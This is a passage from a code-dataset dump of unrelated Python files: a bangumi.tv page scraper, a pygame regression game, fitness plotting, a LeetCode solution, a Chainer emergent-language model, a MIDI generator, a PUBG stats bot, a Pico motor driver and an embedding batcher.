__main__()\n\n","repo_name":"avivk9/AWS_anomaly_detection","sub_path":"Machine Codes/low_cpu_usage.py","file_name":"low_cpu_usage.py","file_ext":"py","file_size_in_byte":312,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"} +{"seq_id":"477300638","text":"import random\nimport time\n\nimport requests # 导库\nfrom bs4 import BeautifulSoup\n\nfrom requests_tool import get_random_date_str\nfrom file_tools import open_text, write_list_to_file\n\ncommon_property_list = [\n '简体中文名: ',\n '别名: ',\n '性别: ',\n '生日: ',\n '血型: ',\n '身高: ',\n '星座: ',\n '出身地区: ',\n '所属公司: ',\n '引用来源: ',\n '个人状态: ',\n '官网: ',\n 'FanClub: ',\n 'Twitter: ',\n 'Facebook: '\n]\n\nspecial_property_list = [\n '职业: ',\n]\n\n\n# 获取html页面文本\ndef get_html_text(url):\n param = {\n 'Connection': 'close',\n 'Content-Encoding': 'gzip',\n 'Content-Type': 'text/html',\n 'Server': 'nginx',\n 'Transfer-Encoding': 'chunked',\n 'Vary': 'Accept-Encoding'\n }\n header = {'Content-Type': 'text/html; charset=utf-8'}\n user_agent_list = [\n \"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36\",\n \"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36\",\n \"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.186 Safari/537.36\",\n \"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.62 Safari/537.36\",\n \"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36\",\n \"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)\",\n \"Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10.5; en-US; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15\",\n ]\n header['User-Agent'] = random.choice(user_agent_list)\n param['Date'] = get_random_date_str()\n r = requests.get(url, params=param, headers=header, timeout=30)\n r.raise_for_status() # 如果状态不是200,引发HTTPError异常\n r.encoding = r.apparent_encoding # 因为apparent更准确\n return r.text\n\n\ndef get_dict_for_html_text(i):\n file_content = open_text(i)\n res_dict = {'id': i}\n\n # 解析HTML代码\n html_code = BeautifulSoup(file_content, 'html.parser')\n\n # 固定属性\n for common_property in common_property_list:\n span_list = []\n spans = html_code.find_all(\"span\", string=common_property)\n for span in spans:\n if span:\n span_list.append(span.parent.text.replace(common_property, '').strip())\n res_dict[common_property.replace(':', '').strip()] = span_list\n\n # 职业\n h2s = html_code.find_all('h2', {'class': 'subtitle'})\n for h2 in h2s:\n if h2.text.find('职业:') != -1:\n res_dict['职业:'.replace(':', '').strip()] = h2.text.replace('职业:', '').strip().split(' ')\n\n # 原名\n h1s = html_code.find_all('h1', {'class': 'nameSingle'})\n for h1 in h1s:\n res_dict['名称'] = h1.find('a').text\n\n return res_dict\n\n\ndef get_person_html_text(start, end):\n base_url = 'https://bangumi.tv/person/{}'\n file_name = 'person_{}.txt'\n save_html_path = './html'\n error_file_no_list = []\n for i in range(start, end):\n try:\n # 尝试进行操作,可能会抛出异常\n url = base_url.format(i)\n html_text = get_html_text(url)\n with open(f'{save_html_path}/' + file_name.format(i), 'w+', encoding='utf-8') as file:\n file.write(html_text)\n time.sleep(random.randint(1, 4))\n print('========={}/{}========='.format(i, end))\n except ValueError:\n # 如果遇到异常(这里是值错误),捕获并输出消息\n print('========={}获取失败========='.format(i))\n error_file_no_list.append(i)\n continue\n\n write_list_to_file(error_file_no_list, save_html_path + '')\n\n\n\n","repo_name":"Rakbow/requests_test","sub_path":"requests_test.py","file_name":"requests_test.py","file_ext":"py","file_size_in_byte":3838,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"17855881543","text":"\"\"\" APRIL 12, 2021 \"\"\"\n\n\nimport pygame\nimport numpy as np\nfrom setup.settings import Settings\nfrom setup.pygameBasics import PygameBasics\nfrom plot import Plot\nfrom line import FitLine\n\n\nclass Main(PygameBasics):\n def __init__(self):\n pygame.init()\n super().__init__()\n\n self.fitline = FitLine(self.win)\n self.plot = Plot(self.win)\n\n ## Movement flags\n self.moving = False\n self.rotating = False\n self.show_centroid = False\n\n ## Display flags\n self.show_intercepts = False\n\n\n \"\"\" EVENTS \"\"\"\n\n def left_click_events(self):\n pygame.mouse.get_rel()\n self.moving = True\n\n\n def right_click_events(self):\n self.rotating = -2 ## trig degrees are counter-clockwise. negative = clockwise\n\n def mouse_button_up_events(self):\n self.moving = False\n self.rotating = False\n\n def keydown_events(self, event):\n if event.key == pygame.K_a:\n self.rotating = 0.05 ## trig degrees are counter-clockwise. positive = counter clockwise\n\n if event.key == pygame.K_d:\n self.rotating = -0.05 ## trig degrees are counter-clockwise. negative = clockwise\n\n if event.key == pygame.K_c:\n self.show_centroid = not self.show_centroid\n\n if event.key == pygame.K_i:\n self.show_intercepts = not self.show_intercepts\n\n if event.key == pygame.K_q:\n pygame.quit(), quit()\n\n\n def keyup_events(self, event):\n self.rotating = False\n\n\n \"\"\" UPDATES \"\"\"\n\n def updates(self):\n self.plot.update(self.show_centroid)\n self.fitline.update(self.moving, self.rotating, self.show_intercepts)\n self.draw()\n\n\n def draw(self):\n self.win.fill(self.set.white)\n self.draw_page_border()\n self.plot.draw()\n self.fitline.draw()\n\n pygame.display.update()\n\n\n \"\"\" MAIN \"\"\"\n\n def main(self):\n while True:\n self.win.fill(self.set.white)\n self.set.clock.tick(self.set.FPS)\n self.events()\n self.updates()\n\nif __name__ == \"__main__\":\n x = Main()\n x.main()\n","repo_name":"Biuku/LinearRegressionGame","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2137,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"21"} +{"seq_id":"17171211890","text":"\nfrom pathlib import Path\n\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\n\nfrom .plotoptions import COLORS\n\n# define name of index column for convenience\nINDEX = 'Function Evaluations'\n\ncindex = 0\n\ndef _get_fitness_df_means(df, quantiles=30):\n ''' Convert the fitness dataframe to a dataframe of means.\n Split evently between param quantiles.'''\n\n # sort by function evaluation\n df = df.sort_values(INDEX)\n\n # create bins\n df['quantile'] = pd.qcut(df[INDEX], q=quantiles)\n\n # group by the bins\n grouped = df.groupby('quantile')\n\n # find the mean of each bin\n means = grouped.mean()\n\n return means\n\ndef plot_fitness_df(df, label='Fitness', ax=None, quantiles=30):\n\n # get means\n means = _get_fitness_df_means(df, quantiles)\n\n # get color\n global cindex\n try:\n color = COLORS[cindex]\n except IndexError:\n cindex = 0\n color = COLORS[cindex]\n finally:\n cindex += 1\n\n # set plot commands based on input axis\n if ax is None:\n ax = plt\n ax_arg = None\n else:\n ax_arg = ax\n\n # plot\n ax.fill_between(x=means[INDEX], y1=means['90th Percentile'], y2=means['10th Percentile'], color=color, alpha=0.3)\n means.plot(x=INDEX, y='Mean Fitness', c=color, ax=ax_arg, label=label)\n\n # axis settings\n ax.set_title('Fitness Curves')\n ax.set_xlabel('Function Evaluations')\n ax.set_ylabel('Fitness')\n \ndef convergence_stats(df, target, tolerance=0.10, quantiles=30):\n ''' Gets convergence statistics\n Returns (f evals to converge, f evals to get target in population)\n Target value is optimum fitness\n '''\n\n # get means\n means = _get_fitness_df_means(df, quantiles)\n\n def get_first_row_with(condition, df):\n for index, row in df.iterrows():\n if condition(row):\n return index, row\n return None, None # Condition not met on any row in entire DataFrame\n\n def mean_is_optimum(row):\n fitness = row['Mean Fitness']\n top = fitness + fitness * tolerance\n bottom = fitness - fitness * tolerance\n if target < top and target > bottom:\n return True\n else:\n return False\n\n def target_in_population(row):\n perc10 = row['10th Percentile']\n perc90 = row['90th Percentile']\n\n if perc10 < perc90:\n bottom = perc10 - perc10 * tolerance\n top = perc90 + perc90 * tolerance\n else:\n top = perc10 + perc10 * tolerance\n bottom = perc90 - perc90 * tolerance\n \n if target < top and target > bottom:\n return True\n else:\n return False\n\n # find f_eval num when the mean is within 10% of the target value\n _, row = get_first_row_with(mean_is_optimum, means)\n if row is None:\n f_evals_to_converge = np.nan\n else:\n f_evals_to_converge = row['Function Evaluations']\n\n # find f_eval num when target value is within population\n _, row = get_first_row_with(target_in_population, means)\n if row is None:\n f_evals_to_get_target_in_pop = np.nan\n else:\n f_evals_to_get_target_in_pop = row['Function Evaluations']\n\n return f_evals_to_converge, f_evals_to_get_target_in_pop\n","repo_name":"nprezant/mlga","sub_path":"mlga/postprocessing/fitness.py","file_name":"fitness.py","file_ext":"py","file_size_in_byte":3268,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"16059053004","text":"\"\"\"\n-*- coding: utf-8 -*-\n@File : 移动零-双指针.py\n@Time : 2022/4/10\n@Author: Tk \n@Software: PyCharm\n\n输入:\n0,1,0,3,12\n输出:\n[1,3,12,0,0]\n\"\"\"\nnums = list(map(int, input().split(\",\")))\n\n\nclass Solution:\n def moveZeroes(self, nums):\n \"\"\"\n Do not return anything, modify nums in-place instead.\n \"\"\"\n left, right = 0, 0\n n = len(nums)\n while right < n:\n if nums[right] != 0:\n nums[left], nums[right] = nums[right], nums[left]\n left += 1\n right += 1\n return nums\n\n\ns = Solution()\nresult = s.moveZeroes(nums)\nprint(result)\n","repo_name":"looking-for-my-magic-bean/leetcode","sub_path":"TOP100/数组/移动零-双指针.py","file_name":"移动零-双指针.py","file_ext":"py","file_size_in_byte":653,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"42614028050","text":"#!/usr/bin/env python\nfrom __future__ import print_function\nimport argparse\n\nimport chainer\nimport chainer.functions as F\nimport chainer.links as L\nfrom chainer import training\nfrom chainer.training import extensions\nfrom chainer import reporter\n\nimport numpy as np\n\n\nclass Speaker(chainer.Chain):\n\n def __init__(self, n_in, n_middle, n_units):\n super(Speaker, self).__init__(\n sensor=Sensor(n_in, n_middle),\n\n l1_first=L.Linear(n_middle, n_units),\n l1_next=L.Linear(n_middle * 2, n_units),\n l2_first=L.Linear(n_units, n_units),\n l2_next=L.Linear(n_units, n_units),\n bn1_first=L.BatchNormalization(n_units, use_cudnn=False),\n bn1_next=L.BatchNormalization(n_units, use_cudnn=False),\n bn2_first=L.BatchNormalization(n_units, use_cudnn=False),\n bn2_next=L.BatchNormalization(n_units, use_cudnn=False),\n )\n self.act = F.tanh\n\n def __call__(self, x, z, language, turn, n_word=3, train=True, with_recon=False):\n if with_recon:\n true_image, rec_loss = self.sensor(\n x, true=True, train=train, with_recon=True)\n else:\n true_image = self.sensor(x, true=True, train=train)\n\n if turn == 0:\n h1 = self.act(self.bn1_first(\n self.l1_first(true_image), test=not train))\n thought = self.act(self.bn2_first(\n self.l2_first(h1), test=not train))\n rec_loss_now, rec_loss = 0., 0.\n else:\n if with_recon:\n now_image, rec_loss_now = self.sensor(\n z, true=False, train=train, with_recon=True)\n else:\n now_image = self.sensor(z, true=False, train=train)\n rec_loss_now = 0.\n comparison = F.concat([true_image, now_image], axis=1)\n h1 = self.act(self.bn1_next(\n self.l1_next(comparison), test=not train))\n thought = self.act(self.bn2_next(self.l2_next(h1), test=not train))\n\n sampled_word_idx_seq, total_log_probability = language.decode_thought(\n thought, n_word, turn, train=train)\n\n if with_recon:\n return sampled_word_idx_seq, total_log_probability, rec_loss + rec_loss_now\n else:\n return sampled_word_idx_seq, total_log_probability\n\n\nclass Sensor(chainer.Chain):\n\n def __init__(self, n_in, n_units):\n super(Sensor, self).__init__(\n l1=L.Linear(n_in, n_units),\n l2=L.Linear(n_units, n_units),\n l3=L.Linear(n_units, n_units),\n\n rec_l1=L.Linear(n_units, n_units),\n rec_l2=L.Linear(n_units, n_units),\n rec_l3=L.Linear(n_units, n_in),\n )\n self.act = F.relu\n\n def __call__(self, x, true=True, train=True, with_recon=False):\n h1 = self.act(self.l1(x))\n h2 = self.act(self.l2(h1))\n h3 = self.act(self.l3(h2))\n\n if with_recon:\n return h3, self.reconstruct(x, h3, true=true, train=train)\n else:\n return h3\n\n def reconstruct(self, t, h, true=True, train=True):\n h1 = self.act(self.rec_l1(h))\n h2 = self.act(self.rec_l2(h1))\n h3 = self.act(self.rec_l3(h2))\n return F.mean_squared_error(t, h3)\n\n\nclass Language(chainer.Chain):\n\n def __init__(self, n_units, n_vocab):\n super(Language, self).__init__(\n definition=L.EmbedID(n_vocab, n_units),\n expression=L.Linear(n_units, n_vocab, nobias=True),\n interpreter=L.StatefulGRU(n_units, n_units),\n decoder=L.StatefulGRU(n_units, n_units),\n bn_first_interpreter=L.BatchNormalization(\n n_units, use_cudnn=False),\n bn_next_interpreter=L.BatchNormalization(n_units, use_cudnn=False),\n bn_first_expression=L.BatchNormalization(n_vocab, use_cudnn=False),\n bn_next_expression=L.BatchNormalization(n_vocab, use_cudnn=False),\n )\n self.n_vocab = n_vocab\n self.n_units = n_units\n\n self.add_param('eos', (n_units,), dtype='f')\n self.eos.data[:] = 0\n self.add_param('bos', (n_units,), dtype='f')\n self.bos.data[:] = 0\n\n def decode_word(self, x, turn, train=True):\n probability = F.softmax(self.expression(x))\n\n prob_data = probability.data\n if self.xp != np:\n prob_data = self.xp.asnumpy(prob_data)\n batchsize = x.data.shape[0]\n\n if train:\n sampled_ids = np.zeros((batchsize,), np.int32)\n for i_batch, one_prob_data in enumerate(prob_data):\n sampled_ids[i_batch] = np.random.choice(\n self.n_vocab, p=one_prob_data)\n else:\n sampled_ids = np.zeros((batchsize,), np.int32)\n for i_batch, one_prob_data in enumerate(prob_data):\n sampled_ids[i_batch] = np.argmax(\n one_prob_data).astype(np.int32)\n\n if self.xp != np:\n sampled_ids = self.xp.array(sampled_ids)\n sampled_ids = chainer.Variable(sampled_ids, volatile='auto')\n sampled_probability = F.select_item(probability, sampled_ids)\n\n return sampled_ids, sampled_probability\n\n def interpret_word(self, x):\n return self.definition(x)\n\n def interpret_sentence(self, x_seq, turn, train=True):\n self.interpreter.reset_state()\n\n for message_word in x_seq:\n message_meaning = self.interpreter(\n self.interpret_word(message_word))\n\n if turn == 0:\n message_meaning = self.bn_first_interpreter(\n message_meaning, test=not train)\n else:\n message_meaning = self.bn_next_interpreter(\n message_meaning, test=not train)\n\n self.interpreter.reset_state()\n return message_meaning\n\n def decode_thought(self, thought, n_word, turn, train=True):\n sampled_word_idx_seq = []\n total_log_probability = 0.\n if n_word == 1:\n sampled_word_idx, probability = self.decode_word(\n thought, turn, train=train)\n sampled_word_idx_seq.append(sampled_word_idx)\n total_log_probability += F.log(probability)\n else:\n self.decoder.reset_state()\n self.decoder.h = thought\n bos = F.broadcast_to(\n self.bos, (thought.data.shape[0], len(self.bos.data)))\n x_input = bos\n for i in range(n_word):\n h = self.decoder(x_input)\n sampled_word_idx, probability = self.decode_word(\n h, turn, train=train)\n sampled_word_idx_seq.append(sampled_word_idx)\n total_log_probability += F.log(probability)\n x_input = self.interpret_word(sampled_word_idx)\n self.decoder.reset_state()\n return sampled_word_idx_seq, total_log_probability\n\n\nclass Listener(chainer.Chain):\n\n def __init__(self, n_in, n_middle, n_units):\n super(Listener, self).__init__(\n sensor=Sensor(n_in, n_middle),\n\n l1_meaning=L.Linear(n_units, n_middle + n_units),\n l1_addnext=L.Linear(n_middle, n_middle + n_units),\n l2=L.Linear(n_middle + n_units, n_middle),\n bn2_first=L.BatchNormalization(n_middle, use_cudnn=False),\n bn2_next=L.BatchNormalization(n_middle, use_cudnn=False),\n l3=L.Linear(n_middle, n_middle),\n l4=L.Linear(n_middle, n_in),\n )\n self.act = F.relu\n\n def __call__(self, canvas, message_sentence, language, turn, train=True, with_recon=False):\n message_meaning = language.interpret_sentence(\n message_sentence, turn, train=train)\n rec_loss = 0.\n if turn == 0:\n h1 = self.act(self.l1_meaning(message_meaning))\n plus_draw = F.tanh(self.l4(self.act(self.l3(self.act(\n self.bn2_first(self.l2(h1), test=not train))))))\n else:\n h1 = self.l1_meaning(message_meaning)\n if with_recon:\n hidden_canvas, rec_loss = self.sensor(\n canvas, true=False, train=train, with_recon=True)\n else:\n hidden_canvas = self.sensor(\n canvas, true=False, train=train, with_recon=False)\n h1 = self.act(h1 + self.l1_addnext(hidden_canvas))\n plus_draw = F.tanh(self.l4(self.act(self.l3(self.act(\n self.bn2_next(self.l2(h1), test=not train))))))\n if with_recon:\n return plus_draw ** 3, rec_loss\n else:\n return plus_draw ** 3\n\n\nclass World(chainer.Chain):\n\n def __init__(self, n_in, n_middle, n_units, n_vocab, n_word, n_turn):\n super(World, self).__init__(\n language=Language(n_units, n_vocab),\n listener=Listener(n_in, n_middle, n_units),\n speaker=Speaker(n_in, n_middle, n_units),\n )\n self.n_turn = n_turn\n self.n_word = n_word\n\n self.baseline_reward = [None for _ in range(10)]\n self.train = True\n\n def __call__(self, image, generate=False):\n n_turn, n_word = self.n_turn, self.n_word\n accum_loss = 0.\n\n sub_accum_loss = 0.\n accum_reward_obj = 0.\n accum_rec_loss = 0.\n\n batchsize = image.data.shape[0]\n sentence_history = []\n log_prob_history = []\n canvas_history = []\n\n # Initialize canvas of Listener\n #canvas = chainer.Variable(self.xp.zeros(image.data.shape, np.float32), volatile='auto')\n canvas = chainer.Variable(self.xp.ones(\n image.data.shape, np.float32), volatile='auto')\n\n loss_list = []\n raw_loss_list = []\n\n for i in range(n_turn):\n\n # Express the image x compared to canvas by Speaker\n sampled_word_idx_seq, log_probability, rec_loss = self.speaker(\n image, canvas, self.language, turn=i, n_word=n_word, with_recon=True, train=self.train)\n accum_rec_loss += rec_loss\n\n # Interpret the expression\n # Paint it into canvas\n plus_draw, rec_loss = self.listener(\n canvas, sampled_word_idx_seq, self.language, turn=i, with_recon=True, train=self.train)\n accum_rec_loss += rec_loss\n\n canvas = canvas + plus_draw\n canvas = F.clip(canvas, 0., 1.) * 0.9 + canvas * 0.1\n\n if generate:\n canvas_history.append(F.clip(canvas, 0., 1.).data)\n\n sentence_history.append(sampled_word_idx_seq)\n log_prob_history.append(log_probability)\n\n # Calculate comunication loss\n raw_loss = F.sum((canvas - image) ** 2, axis=1)\n raw_loss_list.append(raw_loss)\n loss = F.sum(raw_loss) / image.data.size\n reporter.report({'l{}'.format(i): loss}, self)\n loss_list.append(loss)\n reporter.report({'p{}'.format(i): self.xp.exp(\n log_probability.data.mean())}, self)\n\n #\"\"\"\n decay = 0.5\n accum_loss_pre_step = sum(\n loss_list[j] * decay ** (n_turn - j - 1) for j in range(n_turn - 1))\n sub_accum_loss += accum_loss_pre_step\n #\"\"\"\n\n accum_loss += loss_list[n_turn - 1]\n\n \"\"\"\n # modification loss\n margin = 0.1\n sub_accum_loss += sum(F.relu(margin + loss_list[i] - loss_list[i-1].data) for i in range(1, n_turn))\n \"\"\"\n\n reward = (1. - raw_loss_list[-1]).data\n #reward = (1.-raw_loss_list[-1])\n\n i = 0\n if self.baseline_reward[i] is None:\n obj = F.sum(sum(log_prob_history) / n_word *\n (reward - 0.)) / reward.size\n else:\n obj = F.sum(sum(log_prob_history) / n_word *\n (reward - self.baseline_reward[i])) / reward.size\n #reward = reward.data\n\n accum_reward_obj += obj\n reporter.report({'nr{}'.format(i): obj}, self)\n\n sub_accum_loss -= accum_reward_obj * 0.00001\n\n if self.train:\n if self.baseline_reward[0] is None:\n self.baseline_reward[0] = (self.xp.sum(reward) / reward.size)\n else:\n self.baseline_reward[0] = 0.95 * self.baseline_reward[0] \\\n + 0.05 * (self.xp.sum(reward) / reward.size)\n\n reporter.report({'loss': accum_loss}, self)\n reporter.report({'reward': accum_reward_obj}, self)\n reporter.report({'reconst': accum_rec_loss}, self)\n sub_accum_loss += accum_rec_loss * 0.01\n\n def orthogonal_regularizer(M):\n MM = F.matmul(M, F.transpose(M))\n iden = self.xp.identity(MM.shape[0])\n norm_loss = F.sum((iden - MM * iden) ** 2)\n return F.sum((MM - MM * iden) ** 2) + norm_loss\n\n \"\"\"\n orthogonal_loss = orthogonal_regularizer(self.language.expression.W) + \\\n # orthogonal_regularizer(self.language.definition.W)\n reporter.report({'ortho': orthogonal_loss}, self)\n sub_accum_loss += 0.001 * orthogonal_loss\n \"\"\"\n\n \"\"\"\n def word_l2(idx):\n definition_l2 = self.language.definition(idx) ** 2\n expression_l2 = F.embed_id(idx, self.language.expression.W) ** 2\n return definition_l2 + expression_l2\n L2norm_used_embed = F.sum(sum([sum([word_l2(i) for i in s])\n for s in sentence_history]))\n sub_accum_loss += 0.0001 * L2norm_used_embed / batchsize\n \"\"\"\n\n reporter.report({'total': accum_loss}, self)\n\n accum_loss += sub_accum_loss\n self.sub_accum_loss = sub_accum_loss.data\n\n if generate:\n return [[i.data for i in s] for s in sentence_history], [lp.data for lp in log_prob_history], canvas_history\n else:\n return accum_loss\n","repo_name":"soskek/emergence_of_language_using_discrete_sequences","sub_path":"scripts/links/communicator.py","file_name":"communicator.py","file_ext":"py","file_size_in_byte":13843,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"21"} +{"seq_id":"16127518714","text":"import pretty_midi\nimport json\nimport os\n\ndef json_to_notes_list(json_file):\n with open(json_file, \"r\") as file:\n data = json.load(file)\n # hack because cant figure out the 2x oddity atm\n return data.get('increment', 0.2) / 2.0, data['notes']\n\ndef main():\n generated_path = os.getcwd() + '/midi_generated'\n for file in os.listdir('midi_generated'):\n if file.endswith('.json'):\n midi_obj = pretty_midi.PrettyMIDI()\n piano_program = pretty_midi.instrument_name_to_program('Electric Piano 1')\n piano = pretty_midi.Instrument(program=piano_program)\n\n increment, notes_list = json_to_notes_list(generated_path + '/' + file)\n curr_time = 0.0\n curr_notes = {}\n for chord in notes_list:\n ending_notes = curr_notes.keys() - set(chord)\n for note in ending_notes:\n pm_note = pretty_midi.Note(velocity=60, pitch=note, start=curr_notes[note], end=curr_time)\n del curr_notes[note]\n piano.notes.append(pm_note)\n for note in chord:\n if curr_notes.get(note) is None:\n curr_notes[note] = curr_time\n curr_time += increment\n\n midi_obj.instruments.append(piano)\n midi_obj.write(generated_path + '/' + file[:-5] + '.mid')\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"dmgoodman/MusicGenerator","sub_path":"midi_generator.py","file_name":"midi_generator.py","file_ext":"py","file_size_in_byte":1434,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"11525646937","text":"import json\nimport requests\nfrom ratelimit import *\nfrom util import dev_print\nfrom private_constants import API_KEY\n\nLABELS_TO_REPORT_TO_USER = ['Wins',\n 'Kills',\n 'Top 10s',\n 'Assists',\n 'K/D Ratio',\n 'Team Kills',\n 'Rounds Played',\n 'Headshot Kills',\n 'Longest Time Survived']\n\nHEADERS = {'content-type': \"application/json\",\n 'trn-api-key': API_KEY}\n\nPUBG_TRACKER = 'https://pubgtracker.com/api/profile/pc/%s'\n\nDEFAULT_PLAYER_STAT_STR = 'Invalid syntax, try: !stats player_name '\n\nfrom base_stats import Statistics\n\nclass PUBGPlayerStatistics(Statistics):\n '''\n Provides printable block of statistics on a given player of PUBG.\n '''\n def __init__(self, player_name, game_mode):\n dev_print('init(): PUBGPlayerStatistics created with %s and %s.' % (player_name, game_mode))\n self.player_name = player_name\n self.game_mode = game_mode\n\n title = '%s (%s)' % (self.player_name.upper(), self.game_mode.upper())\n super(PUBGPlayerStatistics, self).__init__(title, default_str=DEFAULT_PLAYER_STAT_STR, headers=['Stat' , 'Value', 'Percentile'])\n\n @rate_limited(2)\n def get_stats(self):\n\n important_stats = []\n try:\n pubgtracker_page = requests.get(PUBG_TRACKER % self.player_name, headers=HEADERS)\n if pubgtracker_page.status_code != 200:\n self.get_request_failed = 'Request to query URL %s failed with status code %s.\\nIs the game down?' % (PUBG_TRACKER % self.player_name, pubgtracker_page.status_code)\n return\n\n all_player_data = json.loads(pubgtracker_page.text)\n\n # Request returns 200, then informs us there is an error.. thanks\n if 'error' in all_player_data:\n self.get_request_failed = 'Pubg Api returned an error: %s' % all_player_data['error']\n return\n\n all_stats = all_player_data['Stats']\n important_stats = [s for s in all_stats if s['Season'] == all_player_data['defaultSeason'] and\n s['Region'] == 'na' and\n s['Match'].lower() == self.game_mode][0]\n except Exception:\n self.list_of_stats = ['N/A', 'N/A', 'N/A']\n\n # other useful stuff is statistics_dict['Match'] / statistics_dict['Stats'] / statistics_dict['Season']\n\n for stat in important_stats['Stats']:\n if stat['label'] in LABELS_TO_REPORT_TO_USER:\n self.list_of_stats.append([stat['label'], stat['displayValue'], stat['percentile']])\n","repo_name":"annapeskin/pubg_discord_bot","sub_path":"player_stats.py","file_name":"player_stats.py","file_ext":"py","file_size_in_byte":2811,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"17077871585","text":"import time\nfrom machine import Pin, PWM\n\nbuttonPin = 0\nledPin = 25\npwmPin = [2, 3, 4]\nenPin = [6, 7, 8]\n\ndebounceTime = 0.005\nlastDebounceTime = 0\n\nPWMFreq = 100000\nPWMResolution = 16\nMAX_DUTY_CYCLE = 2 ** PWMResolution\nduty = int( 0.4 * MAX_DUTY_CYCLE )\n\nbutton = Pin(buttonPin, Pin.IN, Pin.PULL_UP)\nled = Pin(ledPin, Pin.OUT)\nbuttonState = False\nledState = False\ntransientState = False\nstate = False\nstep = 0\n\npwm = []\nfor i in pwmPin:\n p = PWM(Pin(i))\n p.freq(PWMFreq)\n pwm.append(p)\n \nen = []\nfor i in enPin:\n en.append(Pin(i, Pin.OUT))\n \nen[1].value(1)\nen[0].value(1)\npwm[0].duty_u16(duty)\n\nwhile True:\n buttonState = button.value()\n \n if(state != transientState):\n #print(\"Transient state\")\n lastDebounceTime = time.time()\n transientState = state\n \n if((time.time() - lastDebounceTime) > debounceTime):\n if(state == True and buttonState == False):\n #print(\"Button pressed\")\n #ledState = not ledState\n #led.value(ledState)\n print(\"Step \" + str(step))\n \n if step == 0:\n en[2].value(0)\n pwm[2].duty_u16(0)\n \n en[0].value(1)\n pwm[0].duty_u16(duty)\n \n elif step == 1:\n en[1].value(0)\n \n en[2].value(1)\n \n elif step == 2:\n en[0].value(0)\n pwm[0].duty_u16(0)\n \n en[1].value(1)\n pwm[1].duty_u16(duty)\n \n elif step == 3:\n en[2].value(0)\n \n en[0].value(1)\n \n elif step == 4:\n en[1].value(0)\n pwm[1].duty_u16(0)\n \n en[2].value(1)\n pwm[2].duty_u16(duty)\n \n else:\n en[0].value(0)\n en[1].value(1)\n \n step += 1\n step %= 6\n \n #elif(state == False and buttonState == True):\n # print(\"Button released\")\n \n \n state = buttonState","repo_name":"cendanaf/pwm","sub_path":"6543.py","file_name":"6543.py","file_ext":"py","file_size_in_byte":2192,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"32755156612","text":"import torch\nimport random\nfrom typing import Tuple, List\nimport gensim\nimport logging\nimport pickle\ndef batcher(sents, sorted_indices, batch_size, viterbi=False):\n if viterbi:\n viterbi_scaler = 8\n else:\n viterbi_scaler = 8\n cur_len = len(sents[sorted_indices[0]])\n # cur_batch_size = cur_len * 20\n cur_batch_size = batch_size\n cur_batch = []\n cur_indices = []\n batches = []\n batch_indices = []\n for index in sorted_indices:\n\n if len(sents[index]) != cur_len or len(cur_batch) == cur_batch_size:\n\n batches.append(torch.tensor(cur_batch).to('cuda'))\n batch_indices.append(cur_indices)\n cur_batch = []\n cur_indices = []\n cur_len = len(sents[index])\n\n if cur_len <= 10:\n cur_batch_size = batch_size * 120 // viterbi_scaler\n elif cur_len > 10 and cur_len <= 20:\n cur_batch_size = batch_size * 48 // viterbi_scaler\n elif cur_len > 20 and cur_len <= 30:\n cur_batch_size = batch_size * 16 // viterbi_scaler\n elif cur_len > 30 and cur_len <= 40:\n cur_batch_size = batch_size * 8 // viterbi_scaler\n elif cur_len > 40 and cur_len <= 60:\n cur_batch_size = batch_size\n elif cur_len >= 60:\n cur_batch_size = 1\n\n cur_batch.append(sents[index])\n cur_indices.append(index)\n else:\n if cur_batch:\n batches.append(torch.tensor(cur_batch).to('cuda'))\n batch_indices.append(cur_indices)\n\n logging.info( \"Batcher produces {} number of sentences with {} originals\".format(sum([len(x) for x in batches]),\n len(sents)))\n return list(zip(batches, batch_indices))\n\ndef compile_embeddings(word_vecs_file, word_dict, punct_dict, embedding_type='word'):\n\n if word_vecs_file is None:\n return None\n else:\n try:\n if word_vecs_file.endswith('pc') or word_vecs_file.endswith('pkl'):\n with open(word_vecs_file, 'rb') as efh:\n word_vecs = pickle.load(efh)\n else:\n word_vecs = torch.load(word_vecs_file)\n keys = word_vecs\n except:\n word_vecs = gensim.models.KeyedVectors.load(word_vecs_file)\n keys = word_vecs.vocab.keys()\n if embedding_type == 'word':\n lower_word_vecs = {}\n for key in keys:\n word = key.lower()\n if word == '-lrb-' or word == '-rrb-' or word == '-lcb-' or word == '-rcb-':\n word = word.replace('-', '')\n elif word == '#':\n word = '-pound-'\n if word in word_vecs and word != key:\n continue\n elif word not in word_vecs:\n lower_word_vecs[word] = torch.tensor(word_vecs[key])\n elif word == key:\n lower_word_vecs[word] = torch.tensor(word_vecs[key])\n useful_vecs = []\n for i in range(len(word_dict)):\n word = word_dict[i]\n if word not in lower_word_vecs and 'PUNCT' in word:\n word = punct_dict[word]\n word = word.lower()\n assert word in lower_word_vecs, \"{} not in word vecs\".format(word)\n useful_vecs.append(lower_word_vecs[word])\n 